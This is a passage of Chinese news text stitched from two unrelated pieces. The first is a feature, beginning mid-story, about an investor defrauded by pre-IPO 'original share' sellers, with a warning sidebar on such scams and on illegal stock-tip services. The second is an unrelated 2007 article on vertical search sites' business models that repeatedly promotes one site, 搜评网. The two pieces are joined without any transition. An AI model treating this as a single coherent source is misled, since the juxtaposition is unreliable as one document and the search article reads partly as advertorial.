　　想到来推销的是正规的证券公司、买的又是将在中小板上市的公司股票，而且连推销的人自己都买了……终于，在两人的鼓动下，秦晓帆以每股4.2元的价格，按他们的要求以现金付款的方式买了7万股四川国鸿，投入29.4万元。当时是2005年6月。

　　秦晓帆后来才获知，张婷和施正楠原来并非第一证券的员工，而是隶属于上海实信产权经纪公司。他们只不过租借了第一证券营业部的场地，却对外打起证券公司的旗号。

　　越陷越深

　　2005年8月，施正楠突然打电话告诉她，最新的评估结果出来了，四川国鸿上年每股收益高达0.7元。现在还剩下一点股份，可以按照员工的优惠价卖给她，买10000股送1000股。

　　“我当时要求第一次买的也要享受员工待遇，施后来同意了，于是我又交了21万元，得到62000股。这样，在四川国鸿上我一共投进去50.4万元。”

　　就在这段时间，中国资本市场进入股改。当秦晓帆向施打听这些原始股的情况时，对方推说因股改的关系，IPO暂时停顿了。“他告诉我，‘正因为股改，这些公司才会把原始股卖给你，否则人家早就上市了，哪里轮得到你？’我想这也不是他们的问题，是国家政策，于是就继续等待。”

　　2005年11月的一天，对方的财务杨洋突然找到她，说还有一家更好的公司—————华茂农科也即将上市，厚厚一沓评估报告都出来了，都是专业的评估公司做的，问她要不要买。“当时我就说，只要你们自己人买了，我就买。于是他们又给我看了交割单。我再次相信了他们，以51.75万元买了13万股华茂农科。”

　　“那段时间我和他们经常碰面，自以为对他们很了解、很放心，感觉他们不像骗子。”对自己当初的轻信，秦晓帆至今悔恨不已。

　　就在她买入华茂农科半年后，2006年6月，杨洋又给她打来电话，约她去买一家在海外上市的公司—————春飞日化。“我当时问她自己买不买，她说买的。于是我凑了10.72万元，和她一起去了那家中介机构，买了2万股春飞日化，她则投了5万多元。后来我才知道，这是场彻彻底底的骗局—————就在我们两个交钱之后，杨洋说请我喝咖啡，就一起走了；等我们前脚刚走，施正楠后脚就去把他们的5万多元取出来了。”

　　如梦方醒

　　直到2006年8月的一天，秦晓帆从报纸上看到关于原始股骗局的报道后才缓过神来，赶紧打电话给施正楠，发现手机已关机。意识到自己被骗的秦晓帆报了案。

　　就在警方立案侦查的同时，秦晓帆也开始了自己的调查：她从四川工商局得到的一份资料显示，四川国鸿自2003年后就没有进行过工商年检，也就是说这家公司很可能从2003年以后就没有了，而且股东名册上根本没有她的名字。

　　颇具意味的是，本案的主犯施正楠最后也是秦晓帆通过一己之力找到的。

　　当时是国庆节，秦晓帆在施正楠父母的家门口守了七天，终于在长假的最后一天等到了施，并等他酒足饭饱回到自己家后，才闯了进去和他谈判。

　　“一开始，施正楠说愿意偿还我51万元的损失，将他刚买的这间房子过户到我的名下，不过要先打几个电话问问情况。等到电话打完，他突然翻了脸，扔给我一句话：‘这个罪也就是非法经营，最多关个三五年。房子不会给你，要报案的话请便。’”

　　秦晓帆最终拨打了110，随后赶到的警方将施正楠拘捕归案。

　　直到警方侦破此案，秦晓帆才知道：最早接待她的那个张婷其实用的是化名，真名叫金国丹。杨洋也是化名，其真名叫周莉琴，她是施正楠的老婆。

　　同病相怜

　　在庭审前的这段时间，越来越多的被害人前往中介机构要讨回损失，秦晓帆遇到不少：有个80多岁的老汉被骗了50多万元，在得知对方已经人去楼空后竟然在大庭广众之下小便失禁。还有一个在原始股上投了10多万元的送水工，哭诉说这些钱都是他一桶桶水送出来的，如今一夜成空。更有些已经退休的中老年人，多年积蓄血本无归后，从此在愧疚、懊悔中度日。

　　秦晓帆也是其中之一。她至今只能靠双亲的2000元退休工资维持生活。她在原始股上投下的100多万元中有50万元还是借来的。

　　（应采访对象要求，文中“秦晓帆”系化名）

　　快报记者陈其珏

　　【相关链接】

　　原始股敛财常见模式

　　专家介绍，原始股案件通常的行为模式包括以下几个步骤：

　　他们首先会找到一家未上市的股份公司或注册一家股份有限公司，对其进行包装，虚构或扩大公司的经营规模、业绩和发展前景，再以该公司拟上市为名，对外出售股票。多采用随机拨打电话给投资人的方式推销，以公司上市需凑足一定股东人数、要达到一定数量的股份等为借口，许以高额回报来诱骗投资者购买股票。销售股票所得款，大部分由销售人员占有，小部分交给了所谓要上市的公司。

　　证券非法咨询活动

　　现身网络、手机短信

　　当下证券非法咨询活动的新动向主要是一些不具有证券投资咨询业务资格的机构和个人，借助网络、手机短信等方式推荐股票，招揽客户，兜售证券投资相关产品。

　　一是传播虚假信息，夸大证券投资收益。一些机构和个人，宣称掌握内幕信息，或与基金公司合作，能够提前介入基金建仓的股票等等，把自己包装成为“炒股高手”、“民间股神”，博得投资者信任；二是以网络、手机短信为主要方式；三是手段翻新，打政策“擦边球”。或以私募基金为名行非法咨询之实，或以提供研究资讯、内幕信息为名通过网络直接收取费用，或以销售荐股软件为名，夸大证券产品功能。

垂直搜索的误区和赢利分析

2007-07-18T15:21:28+08:00

随着广告市场的不断细分，垂直搜索风起云涌。但是，一大批垂直搜索网站，目前还是处于烧钱的阶段，现金流很少，赢利也微乎其微。中国的垂直搜索雷声很大收获很小。

为什么这些网站从表面上看，都做得不错，但是都没有能够达到赚钱的目的？仔细研究发现，不少垂直搜索都进入了赢利的误区。

误区之一：盈利模式不清晰，为搜索而搜索。网站营运的最后目的是为了赢利，如果赢利模式没有想清楚，千万不要贸然启动。比如一些社会性搜索、天气搜索、IP地址查询搜索。虽然，从理论上讲，这些都有市场的需求，但是商业价值不大，盈利模式不清晰，这样的网站赢利就比较困难。除非像IP138，明确定位非赢利机构。

误区之二：流量大就能赚钱。现在有些垂直搜索，为了把流量做大，想了很多办法。比如增加一些商业价值很低但是很多人关注的行业，不惜使用情色图片，采用技术手段增加虚假点击等等。甚至有观点认为，只要流量做大了，即使网站自身不赚钱，也会有风投或者其他大型网站来购买。其实，流量只是网站赢利的必要条件，而不是充分条件。是否能够赚钱，要看带来流量的客户质量。比如：8684公交网，带来的主要是做公交车的用户，这样的用户就不够高端；搜视，作为主要瞄准电视受众的垂直搜索，要取得很大的商业价值，也是一件困难的事情。

误区之三：把很多行业叠加在一起，总有一个行业赚钱！

有一些搜索，把很多行业叠加在一起，显得整个网站杂乱，没有规划，好像什么东西都可以装，但是，什么都没有优势，结果不仅没有达到"东边不亮西边亮"的初衷，而且也失去了自己的个性。垂直搜索范围太宽，接近通用搜索，显然是不太合适的。

误区之四：只要带"商"就商机无限。现在带"商"的垂直搜索太多，有一窝蜂的趋势。商搜、搜商、天网商搜……其实这些搜索大同小异，基本上都是阿里巴巴搜索功能的切割或者变形，没有太多更新的创意。

那么，垂直搜索如何赢利呢？通过对中国约30家垂直搜索网站的研究，总结出以下几点。

首先，要做出自己的特色，在自己选定的搜索领域，做精、做细、做全，做到用户使用一次以后，就再也没有必要使用其它搜索。比如查公交线路，上8684公交网就比较好；查找IP地址，上IP163就比较好；购买汽车、手机，上搜评网，就是最好选择。

其次，站在用户的角度规划搜索结果。像通用搜索那样，把海量的信息交给用户，而不进行分类、整理，垂直搜索就没有意义，就没有优势可言。易比网，专门建立了自己的比较搜索；搜评网，不仅仅对每款产品的信息进行分类，还可以把同类产品拿出2-5款进行列表比较，这样用户一看，就能判断，什么产品才是自己的需要。这样的搜索结果，就远远不是通用搜索能够达到的。

第三、垂直搜索不能太单薄。不少垂直搜索就是瞄准某一个行业，整个网站显得很单薄。比如搜视网，专门针对电视，虽然网站已经有了一定流量，但是内容太单一，空间就有限，他还要受到《中国电视报》网络版TV猫的挑战。因为只能提供单一行业搜索，所以流量也不会太大。建议抓住生活中常用的、商业领域热门的产品，开发集群式垂直搜索，这些领域包括汽车、电脑、手机、电器、房产、旅游等行业，因为这些都是现代都市人不可或缺的每年有巨大消费的行业，当然蕴含巨大商机。比如搜评网、酷讯，在这些方面都值得学习和借鉴。

第四、整合web1.0、web2.0 的优势，把资讯、论坛、博客和搜索有机结合起来，使网站有血有肉，互相带来流量，相得益彰！看看奇虎，周鸿祎就把它弄成门户、博客、搜索的混血儿，还没有看到什么赢利，风投就趋之若鹜；搜评网，将论坛和博客中的网民评论及问答单独按产品或关键词独立搜索，让网民互相分享使用经验，这方面比奇虎旗下的奇酷做的更专业些，这应该也是搜评网获得风投得原因之一。

第五、开发新的赢利产品。如果仅仅只是与通用搜索一样，依靠竞价排名和广告获得赢利，那可能只是切割通用搜索的一块蛋糕，如果垂直搜索利用自身开发的更为精确的数据库系统，在某个行业形成具有权威性的研究报告，就可以形成卖点。搜房最初就是卖报告起家的，现在的艾瑞、易观，研究报告都是重要的收入来源。搜评网，就在汽车、手机、IT、数码等方面形成了建立在搜索大量数据基础上形成的产品消费报告（应该是中国第一个也是唯一一个）和行业咨询报告，也是他们实现赢利的重要产品之一。(n105)